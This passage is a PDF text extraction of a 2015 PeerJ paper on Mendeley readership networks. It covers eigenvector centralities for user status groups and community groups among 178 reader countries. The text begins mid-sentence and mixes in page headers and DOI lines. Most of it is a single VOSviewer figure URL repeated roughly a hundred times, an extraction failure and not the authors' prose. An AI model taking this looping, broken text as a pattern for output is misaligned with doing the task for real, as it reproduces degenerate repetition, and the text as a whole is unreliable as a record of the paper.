probably to some extend due to the fact that students (especially PhD and Haunschild et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.32 8/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.32 Table 2 Eigenvector centralities and absolute number of reader counts (N) of different status groups among networked Mendeley users (using the Hubs & Authorities routine in Pajek). Status group Eigenvector centrality N Student PhD 0.45 3,364,144 Student master 0.39 1,514,606 Post doc 0.34 1,148,860 Researcher at an academic institution 0.30 667,995 Doctoral student 0.29 616,738 Student bachelor 0.28 678,839 Student post-graduate 0.25 482,784 Assistant professor 0.23 409,591 Researcher at a non-academic institution 0.23 444,874 Full professor 0.22 378,685 Associate professor 0.20 316,606 Lecturer 0.10 126,848 Librarian 0.06 77,046 Senior lecturer 0.05 63,345 Master) and postdocs form by far the largest status groups. This is in agreement with previous studies which also found that students and postdocs represent the largest user status groups at Mendeley (Bornmann & Haunschild, 2015; Mohammadi et al., 2015). Senior Lecturers—a group with the lowest eigenvector centrality—seem to be interested in publications different from the other status groups. However, the eigenvector centrality is strongly influenced by the absolute number of reader counts. The Spearman rank correlation coefficient between eigenvector centrality and reader counts is 0.986. Note that the status indication may be different among nations. For example, the ranks of “Assistant Professor” and “Lecturer” are virtually non-existent in some countries. On the other side, ranks such as “Reader” (sometimes different from “Lecturer”) and “Habilitand”2 are not covered by the Mendeley classification system. The data suggests 2 “Habilitand” is a status in German- speaking countries for those working on a “Habilitation” as a second PhD which provides teaching rights in the university. that Mendeley readers in the career stages “Reader” and “Habilitand” assign the status “As- sistant professor” to themselves, as this is the highest populated among the professorship categories. Furthermore, some status groups seem redundant, e.g., “Doctoral student”, “Student post-graduate”, and “Student PhD”. However, most Mendeley readers who are working on a doctoral thesis identify themselves as “Student PhD”. Decomposition in terms of nations Among the 200+ countries in the world, 178 countries are indicated among the readership of Mendeley that actively bookmarked records in this database. These countries are all connected with an average degree of 76.02 which means that on average each node is linked to 76 (42.7%) other nodes in the network of 178 nodes. The density of the network is 0.43 (cf. Table 1). The eigenvector centralities of the countries vary only between 0.055 and 0.077. This small variation of eigenvector centrality between countries is probably due to the high connectivity of the countries although there is a large variation of reader counts from 1 (Liberia) to 396,198 (USA). Haunschild et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.32 9/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.32 Figure 5 Group of 53 nations. The unlabeled circles next to the UK and the US indicate the Netherlands and Spain, respectively. The unlabeled circle between Russia and Hong Kong is the Czech Republic. A version with all labels visible can be web-started from http://www.vosviewer.com/vosviewer. php?map=http://www.leydesdorff.net/mendeley/fig5 map.txt&network=http://www.leydesdorff.net/ mendeley/fig5 net.txt&n lines=10000&label size=1.0&label size variation=0.34. The community-finding algorithm distinguishes four groups. However, the modularity among these four groups is low (Q = 0.02, cf. Table 1) because of cross-group network connections: 1. A group of 53 nations that are core to the scientific enterprise, including Russia and China as well as two thirds of the OECD countries (Fig. 5). The OECD member states Chile, Greece, Iceland, Mexico, New Zealand, Norway, Portugal, Slovak Republic, Slovenia, and Turkey are not part of this group. They are part of the second group. 2. A largest group of 115 nations centered around Brazil and India (Fig. 6). 3. A group of ten small nations with “Niger” and “Nigeria” as the central core (not shown). 4. The smallest group with only “Guinea” and “Guinea Bissau” (not shown). Haunschild et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.32 10/15 https://peerj.com/computer-science/ http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 